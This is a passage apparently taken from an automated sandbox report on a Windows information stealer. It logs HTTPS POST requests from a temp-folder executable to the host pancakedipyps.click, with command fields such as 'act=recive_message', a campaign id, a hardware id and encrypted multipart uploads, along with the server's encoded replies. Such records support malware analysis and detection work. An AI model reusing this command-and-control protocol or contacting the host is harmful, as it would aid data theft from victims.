                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                            Host: pancakedipyps.click
                                                                                                                                                                                                                                                            2024-12-21 21:16:26 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                                                                            2024-12-21 21:16:27 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:27 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=0c4v8494qtic99ep62jvn8rg0u; expires=Wed, 16 Apr 2025 15:03:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G5SaLrVbkHMvtkRC6tS3bMMmvI37XC4IApSF4VGk%2Bg2aDu6fsh0x8h6%2BYRgHmfvLA4XPaQkc6XIh56Gf65jQw7ojC9PBq58V8tQCMIBa8pPktZ5sCL8dK2%2BglYGbRPucrP0LOa63"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae4ad2f35c33b-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1678&rtt_var=655&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=910&delivery_rate=1638608&cwnd=171&unsent_bytes=0&cid=c6d6d5f71659c7cb&ts=783&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:16:27 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                                                                            2024-12-21 21:16:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1192.168.2.449795172.67.209.2024437908C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:16:28 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 46
                                                                                                                                                                                                                                                            Host: pancakedipyps.click
                                                                                                                                                                                                                                                            2024-12-21 21:16:28 UTC46OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d
                                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=FATE99--test&j=
                                                                                                                                                                                                                                                            2024-12-21 21:16:29 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:29 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=1aaj64ttl1b9a9kdps2mv4g2ec; expires=Wed, 16 Apr 2025 15:03:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nzq7l7FHHol%2BYGjT3%2BcTyvQVjkQWzXWfK8tNHEvqc1xDK0pevGvrKZlDvm5uxujRdzG4CF0foso0beI5IMEHz9%2FRzcGKuusnme0Ek9XCdtQZgl3w5zUqFm6VmYMSljgufK7pfrPX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae4ba08d5efa9-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=9443&min_rtt=1872&rtt_var=5368&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=949&delivery_rate=1559829&cwnd=140&unsent_bytes=0&cid=189d73cc59e1818f&ts=815&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:16:29 UTC243INData Raw: 34 39 31 63 0d 0a 36 65 74 44 4f 4c 45 66 52 61 77 56 6a 79 52 4e 61 78 78 32 75 6b 48 63 6a 62 53 44 47 58 6d 77 75 49 52 76 48 49 35 79 30 6d 4f 53 79 54 55 61 69 79 74 70 6a 6d 62 71 42 6e 63 66 62 67 50 66 62 66 37 73 30 4b 45 6a 48 39 48 55 39 77 6f 77 72 41 53 2f 51 64 4f 4e 49 6c 54 43 65 6d 6d 4f 63 50 63 47 64 7a 42 6e 56 4e 38 76 2f 72 65 57 35 6e 4d 62 30 64 54 6d 44 6e 66 68 41 72 34 41 67 59 63 6b 55 4e 52 38 49 63 31 35 34 6b 45 6f 44 6e 30 63 31 43 69 78 35 64 6d 68 4e 56 76 56 77 71 5a 56 50 73 4d 58 70 67 4b 6b 69 6a 42 54 6b 32 4a 70 31 7a 66 71 53 6d 39 52 50 68 66 66 49 37 44 72 30 4f 68 78 45 64 6a 63 35 77 74 32 2f 68 75 30 43 34 47 4a 4a 31 48 65 64 54 58 41 63 2b 56 4b 4c 67 52 39 56 4a 5a 6a 75
                                                                                                                                                                                                                                                            Data Ascii: 491c6etDOLEfRawVjyRNaxx2ukHcjbSDGXmwuIRvHI5y0mOSyTUaiytpjmbqBncfbgPfbf7s0KEjH9HU9wowrAS/QdONIlTCemmOcPcGdzBnVN8v/reW5nMb0dTmDnfhAr4AgYckUNR8Ic154kEoDn0c1Cix5dmhNVvVwqZVPsMXpgKkijBTk2Jp1zfqSm9RPhffI7Dr0OhxEdjc5wt2/hu0C4GJJ1HedTXAc+VKLgR9VJZju
                                                                                                                                                                                                                                                            2024-12-21 21:16:29 UTC1369INData Raw: 66 65 57 75 54 74 49 34 4e 6e 33 48 47 76 68 41 4c 5a 42 6c 4d 63 34 47 74 52 78 5a 35 59 33 35 55 6f 68 44 48 30 62 33 79 4b 2b 2f 64 6e 68 65 42 50 61 33 75 77 43 63 65 4d 65 75 67 61 44 67 43 5a 56 31 48 55 68 77 58 53 74 43 47 38 4f 5a 6c 53 41 59 35 37 2f 31 65 4a 76 46 73 4f 61 2b 55 4e 6e 72 42 65 38 51 64 50 4a 4a 31 54 53 63 43 66 63 66 2b 5a 4e 4b 68 74 31 48 64 55 75 76 75 4c 63 37 6e 67 62 31 64 44 73 41 6e 54 6f 48 62 30 48 69 34 6c 68 46 4a 4e 36 50 34 34 76 72 57 55 71 47 58 6b 59 7a 6d 47 45 72 38 6d 76 59 6c 76 56 31 71 5a 56 50 75 51 56 73 77 4b 41 68 69 4a 53 32 47 38 6e 33 48 48 67 51 7a 30 50 65 78 72 53 49 4b 7a 6c 32 4f 64 34 45 74 6e 54 34 77 70 36 72 46 37 77 42 70 50 4a 65 52 72 79 63 43 7a 43 66 66 70 47 62 78 59 77 44 5a 67 6b
                                                                                                                                                                                                                                                            Data Ascii: feWuTtI4Nn3HGvhALZBlMc4GtRxZ5Y35UohDH0b3yK+/dnheBPa3uwCceMeugaDgCZV1HUhwXStCG8OZlSAY57/1eJvFsOa+UNnrBe8QdPJJ1TScCfcf+ZNKht1HdUuvuLc7ngb1dDsAnToHb0Hi4lhFJN6P44vrWUqGXkYzmGEr8mvYlvV1qZVPuQVswKAhiJS2G8n3HHgQz0PexrSIKzl2Od4EtnT4wp6rF7wBpPJeRrycCzCffpGbxYwDZgk
                                                                                                                                                                                                                                                            2024-12-21 21:16:29 UTC1369INData Raw: 64 30 46 74 36 61 71 45 31 35 39 46 44 6f 51 61 47 4b 4e 56 6e 5a 50 78 4c 4e 65 65 4e 42 4f 55 6c 68 57 73 46 6a 75 65 4f 57 75 54 73 57 30 39 4c 67 48 33 48 68 45 37 34 50 68 49 77 75 55 74 4e 39 4b 73 74 7a 35 6b 30 73 42 48 6f 47 30 69 4f 32 36 74 66 72 63 56 75 63 6d 75 45 56 50 72 52 51 67 52 61 41 79 78 52 5a 33 58 4d 67 32 44 66 79 43 44 5a 4a 65 52 69 59 65 2f 37 69 33 75 52 2b 46 4e 50 51 36 41 68 30 34 42 69 2b 41 70 6d 47 4a 56 72 66 64 53 33 44 65 65 6c 4f 4a 67 4a 31 45 74 67 69 74 4b 2b 59 6f 58 77 44 6b 6f 4b 6d 4f 58 6e 67 48 62 39 44 76 6f 6f 76 56 4e 52 72 5a 39 45 35 39 41 59 6f 42 54 35 4d 6d 43 2b 33 37 39 33 72 66 78 76 56 31 2b 4d 4f 65 65 38 64 74 77 75 46 6a 69 56 57 32 6e 41 68 7a 6e 44 70 51 7a 30 4d 64 78 6a 55 59 2f 43 76 30
                                                                                                                                                                                                                                                            Data Ascii: d0Ft6aqE159FDoQaGKNVnZPxLNeeNBOUlhWsFjueOWuTsW09LgH3HhE74PhIwuUtN9Kstz5k0sBHoG0iO26tfrcVucmuEVPrRQgRaAyxRZ3XMg2DfyCDZJeRiYe/7i3uR+FNPQ6Ah04Bi+ApmGJVrfdS3DeelOJgJ1EtgitK+YoXwDkoKmOXngHb9DvoovVNRrZ9E59AYoBT5MmC+3793rfxvV1+MOee8dtwuFjiVW2nAhznDpQz0MdxjUY/Cv0
                                                                                                                                                                                                                                                            2024-12-21 21:16:29 UTC1369INData Raw: 4c 6d 75 45 42 50 72 52 51 75 51 69 5a 68 79 39 54 33 6e 73 76 79 58 6e 67 54 53 6b 43 65 52 50 65 4c 72 62 69 30 2b 4a 36 48 39 6a 49 35 51 5a 30 34 52 72 77 54 38 75 4f 4f 52 71 4c 50 51 44 43 58 76 31 64 50 52 38 2b 43 35 59 36 2f 75 6a 61 6f 53 4e 62 30 64 58 76 41 6e 62 6b 48 37 38 46 68 59 38 6e 56 39 5a 79 4c 64 78 2f 34 30 73 6b 42 6e 55 47 32 43 36 36 34 39 4c 70 63 42 47 53 6c 4b 59 4b 5a 71 78 49 38 44 53 47 68 69 46 5a 78 54 30 34 67 47 36 74 51 53 4e 4a 4a 6c 54 55 4c 62 37 67 32 75 31 77 45 39 50 57 36 41 70 37 35 52 69 34 45 34 71 4e 4b 56 76 64 63 69 62 4b 63 75 68 43 4b 41 31 34 47 35 68 74 2f 75 6a 4f 6f 53 4e 62 2f 66 33 54 54 31 2f 57 55 4b 39 50 6b 73 6b 6d 56 70 4d 6c 5a 38 4a 30 34 55 34 67 44 33 63 59 30 69 71 31 34 39 33 6c 64 78
                                                                                                                                                                                                                                                            Data Ascii: LmuEBPrRQuQiZhy9T3nsvyXngTSkCeRPeLrbi0+J6H9jI5QZ04RrwT8uOORqLPQDCXv1dPR8+C5Y6/ujaoSNb0dXvAnbkH78FhY8nV9ZyLdx/40skBnUG2C6649LpcBGSlKYKZqxI8DSGhiFZxT04gG6tQSNJJlTULb7g2u1wE9PW6Ap75Ri4E4qNKVvdcibKcuhCKA14G5ht/ujOoSNb/f3TT1/WUK9PkskmVpMlZ8J04U4gD3cY0iq1493ldx
                                                                                                                                                                                                                                                            2024-12-21 21:16:29 UTC1369INData Raw: 44 48 2f 71 41 72 63 49 6d 59 63 73 56 64 74 31 4c 73 39 7a 36 45 73 70 42 58 51 56 33 79 32 77 35 35 61 76 4f 78 7a 4b 6d 72 35 4e 58 2f 77 4c 6f 68 65 47 71 43 78 56 6b 32 4a 70 31 7a 66 71 53 6d 39 52 50 68 33 4b 4a 37 50 39 33 2b 5a 31 46 4e 48 49 35 77 42 31 2f 68 65 2f 42 59 79 46 4a 31 58 56 66 43 4c 45 65 2b 70 44 4a 41 5a 79 56 4a 5a 6a 75 66 65 57 75 54 73 31 32 63 6e 78 44 6e 44 6e 42 71 74 42 6c 4d 63 34 47 74 52 78 5a 35 59 33 37 6b 30 6b 44 58 34 59 32 43 65 7a 37 38 54 75 66 42 7a 62 30 66 51 48 65 65 73 62 75 41 71 45 6a 7a 4e 57 33 57 38 69 33 47 57 74 43 47 38 4f 5a 6c 53 41 59 34 6a 6f 78 76 46 34 57 65 50 4d 35 52 74 31 34 52 7a 77 48 73 57 51 59 56 33 66 50 58 2b 4f 63 65 4a 50 4c 41 5a 2f 48 64 51 75 75 2b 62 54 34 48 30 66 32 4e 44
                                                                                                                                                                                                                                                            Data Ascii: DH/qArcImYcsVdt1Ls9z6EspBXQV3y2w55avOxzKmr5NX/wLoheGqCxVk2Jp1zfqSm9RPh3KJ7P93+Z1FNHI5wB1/he/BYyFJ1XVfCLEe+pDJAZyVJZjufeWuTs12cnxDnDnBqtBlMc4GtRxZ5Y37k0kDX4Y2Cez78TufBzb0fQHeesbuAqEjzNW3W8i3GWtCG8OZlSAY4joxvF4WePM5Rt14RzwHsWQYV3fPX+OceJPLAZ/HdQuu+bT4H0f2ND
                                                                                                                                                                                                                                                            2024-12-21 21:16:29 UTC1369INData Raw: 41 2f 2b 47 4d 75 4f 4c 52 71 4c 50 53 54 4a 64 4f 78 4d 4a 67 56 78 45 39 77 78 74 4f 6a 45 34 48 6f 51 33 39 62 6d 41 48 50 6d 45 62 6b 4d 68 34 51 6d 58 64 78 34 5a 34 41 33 36 6c 35 76 55 54 34 31 31 53 69 79 74 49 79 68 5a 46 58 4c 6d 75 45 42 50 72 52 51 73 41 75 4f 67 79 78 5a 33 48 34 31 7a 33 48 2f 52 69 49 44 62 42 37 54 4a 72 50 69 32 2b 4a 39 48 64 6e 57 39 41 52 2b 37 78 76 77 54 38 75 4f 4f 52 71 4c 50 51 54 5a 59 65 64 42 49 78 39 31 46 64 73 31 73 2f 2b 57 72 7a 73 4b 31 63 75 6d 56 57 6a 38 42 37 63 65 78 5a 42 68 58 64 38 39 66 34 35 78 35 45 41 6f 44 33 41 47 33 53 57 78 34 4e 2f 6f 66 78 50 52 32 75 49 4a 65 65 6b 54 76 41 71 4d 69 69 35 65 32 6e 4d 75 77 54 65 6a 42 69 67 52 50 6b 79 59 41 71 58 73 32 75 77 37 42 4a 7a 44 70 67 70 79
                                                                                                                                                                                                                                                            Data Ascii: A/+GMuOLRqLPSTJdOxMJgVxE9wxtOjE4HoQ39bmAHPmEbkMh4QmXdx4Z4A36l5vUT411SiytIyhZFXLmuEBPrRQsAuOgyxZ3H41z3H/RiIDbB7TJrPi2+J9HdnW9AR+7xvwT8uOORqLPQTZYedBIx91Fds1s/+WrzsK1cumVWj8B7cexZBhXd89f45x5EAoD3AG3SWx4N/ofxPR2uIJeekTvAqMii5e2nMuwTejBigRPkyYAqXs2uw7BJzDpgpy
                                                                                                                                                                                                                                                            2024-12-21 21:16:29 UTC1369INData Raw: 48 54 79 51 46 52 78 58 67 67 32 44 58 59 52 53 45 48 65 51 4b 59 50 49 47 68 6c 75 35 68 57 34 72 6a 2f 30 31 35 34 46 44 6f 51 5a 36 4f 49 56 33 4a 61 79 44 43 5a 75 5a 4c 49 79 74 78 45 38 34 67 73 65 7a 48 36 44 63 51 33 35 71 6f 54 58 6e 30 55 4f 68 42 70 49 34 33 57 66 78 2b 4e 73 63 33 6f 77 59 6f 48 7a 35 4d 6d 42 33 2b 2f 64 58 78 65 42 54 44 35 4b 5a 56 5a 39 4a 51 75 78 65 4d 6d 53 4a 4d 32 48 41 72 33 30 6d 74 48 6e 74 62 4c 45 61 4b 63 61 47 76 79 64 34 31 57 39 4f 61 76 6a 52 6e 72 41 62 77 57 64 6e 48 59 55 69 54 4a 57 65 4a 64 50 39 55 4b 51 70 6f 46 35 38 64 67 4d 6a 41 36 33 77 4c 31 63 33 70 54 54 43 73 48 2f 42 5a 73 73 6b 6f 58 63 68 73 4d 63 4e 6e 36 67 59 51 52 7a 34 4d 6d 48 76 2b 32 74 58 76 64 52 7a 45 79 36 73 71 61 4f 59 58 6f
                                                                                                                                                                                                                                                            Data Ascii: HTyQFRxXgg2DXYRSEHeQKYPIGhlu5hW4rj/0154FDoQZ6OIV3JayDCZuZLIytxE84gsezH6DcQ35qoTXn0UOhBpI43Wfx+Nsc3owYoHz5MmB3+/dXxeBTD5KZVZ9JQuxeMmSJM2HAr30mtHntbLEaKcaGvyd41W9OavjRnrAbwWdnHYUiTJWeJdP9UKQpoF58dgMjA63wL1c3pTTCsH/BZsskoXchsMcNn6gYQRz4MmHv+2tXvdRzEy6sqaOYXo
                                                                                                                                                                                                                                                            2024-12-21 21:16:29 UTC1369INData Raw: 73 56 5a 39 7a 4c 4d 35 77 2f 56 41 30 52 58 59 58 77 6a 6d 41 30 66 33 74 66 52 7a 49 33 65 41 72 58 71 78 65 38 41 37 4c 30 52 67 61 6d 7a 30 59 67 44 66 31 42 6e 64 4a 53 78 66 57 4c 62 6e 35 78 36 78 54 4f 4f 6a 67 70 43 46 35 2b 56 4b 45 42 70 75 59 4b 6c 66 66 50 57 6d 4f 63 61 30 65 66 30 63 2b 45 4d 6c 6a 35 72 2b 45 75 69 35 49 68 59 71 30 45 6a 44 31 55 4b 5a 42 30 39 74 76 47 73 45 39 66 34 34 77 37 6c 51 39 44 33 30 43 32 32 53 41 30 66 48 76 66 42 72 45 79 76 45 43 51 4e 49 46 73 77 2b 46 6a 6a 64 4c 6b 7a 4e 6e 77 54 65 31 66 32 39 42 50 69 75 57 59 36 61 76 6a 71 46 4f 47 4e 7a 55 34 52 74 76 6f 54 65 2b 42 6f 71 66 4d 55 33 63 50 57 6d 4f 63 61 30 65 66 55 63 2b 45 4d 6c 6a 35 72 2b 45 75 69 35 49 68 59 71 30 45 6a 44 31 55 4b 5a 42 30 39
                                                                                                                                                                                                                                                            Data Ascii: sVZ9zLM5w/VA0RXYXwjmA0f3tfRzI3eArXqxe8A7L0Rgamz0YgDf1BndJSxfWLbn5x6xTOOjgpCF5+VKEBpuYKlffPWmOca0ef0c+EMlj5r+Eui5IhYq0EjD1UKZB09tvGsE9f44w7lQ9D30C22SA0fHvfBrEyvECQNIFsw+FjjdLkzNnwTe1f29BPiuWY6avjqFOGNzU4RtvoTe+BoqfMU3cPWmOca0efUc+EMlj5r+Eui5IhYq0EjD1UKZB09
                                                                                                                                                                                                                                                            2024-12-21 21:16:29 UTC1369INData Raw: 65 6d 58 75 63 50 74 46 62 30 63 2b 47 4a 68 37 2f 75 37 63 38 58 59 55 31 5a 62 68 46 33 6d 73 58 76 41 50 79 39 46 68 57 39 6c 74 4b 73 46 77 6f 55 41 68 42 7a 34 4c 6c 6a 72 2b 2b 5a 61 35 4b 46 57 53 79 4b 5a 56 50 71 73 54 6f 68 4f 4e 69 6a 64 5a 6c 45 4d 5a 34 32 58 71 56 69 78 4c 54 78 6e 63 4e 61 76 73 78 75 5a 46 4a 66 2f 49 34 52 31 39 72 69 47 6d 41 6f 75 48 4a 68 71 64 50 54 2b 4f 4c 36 31 72 50 51 35 75 46 35 68 74 2f 75 4f 57 75 54 73 57 77 4e 33 32 44 6a 4c 72 43 72 64 42 6c 4d 63 34 47 73 55 39 66 35 30 35 72 56 52 76 55 54 35 54 31 69 36 2f 37 4e 6a 69 61 51 6e 55 32 66 41 4f 4f 64 49 75 6e 52 4f 4d 6d 53 49 59 34 6e 41 6a 32 47 4c 75 56 69 67 33 51 44 6e 4b 4a 4b 37 73 6c 4d 31 38 46 74 37 6b 32 44 70 76 36 77 44 79 4a 34 69 66 49 68 71
                                                                                                                                                                                                                                                            Data Ascii: emXucPtFb0c+GJh7/u7c8XYU1ZbhF3msXvAPy9FhW9ltKsFwoUAhBz4Lljr++Za5KFWSyKZVPqsTohONijdZlEMZ42XqVixLTxncNavsxuZFJf/I4R19riGmAouHJhqdPT+OL61rPQ5uF5ht/uOWuTsWwN32DjLrCrdBlMc4GsU9f505rVRvUT5T1i6/7NjiaQnU2fAOOdIunROMmSIY4nAj2GLuVig3QDnKJK7slM18Ft7k2Dpv6wDyJ4ifIhq


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2192.168.2.449798172.67.209.2024437908C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:16:31 UTC286OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=06SU8UHKRVYKFAR26T0
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 18168
                                                                                                                                                                                                                                                            Host: pancakedipyps.click
                                                                                                                                                                                                                                                            2024-12-21 21:16:31 UTC15331OUTData Raw: 2d 2d 30 36 53 55 38 55 48 4b 52 56 59 4b 46 41 52 32 36 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 36 53 55 38 55 48 4b 52 56 59 4b 46 41 52 32 36 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 36 53 55 38 55 48 4b 52 56 59 4b 46 41 52 32 36 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65
                                                                                                                                                                                                                                                            Data Ascii: --06SU8UHKRVYKFAR26T0Content-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--06SU8UHKRVYKFAR26T0Content-Disposition: form-data; name="pid"2--06SU8UHKRVYKFAR26T0Content-Disposition: form-data; name="lid"FATE99--te
                                                                                                                                                                                                                                                            2024-12-21 21:16:31 UTC2837OUTData Raw: 95 40 cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65
                                                                                                                                                                                                                                                            Data Ascii: @xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe
                                                                                                                                                                                                                                                            2024-12-21 21:16:32 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:32 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=0o9db5pk5tnd7vps6egq6431p7; expires=Wed, 16 Apr 2025 15:03:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YvPxwD0pL6VGatlw8I6dUJsPrsifPJ2KW05q6PhuWUtloNiQzn42OW42fOqObIAd%2Bms5fF2pzeL%2FnEoXsTAi3fmiIV1w8N%2FnYVpdS1jsInCNfahUKA2m0wsHRhHeFluFdh45XHsR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae4cba9b4f797-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1518&min_rtt=1517&rtt_var=572&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2847&recv_bytes=19134&delivery_rate=1908496&cwnd=161&unsent_bytes=0&cid=5d3ef3f5b198a30d&ts=1078&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:16:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:16:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            3192.168.2.449799172.67.209.2024437908C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:16:34 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=QYF32KC9
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 8723
                                                                                                                                                                                                                                                            Host: pancakedipyps.click
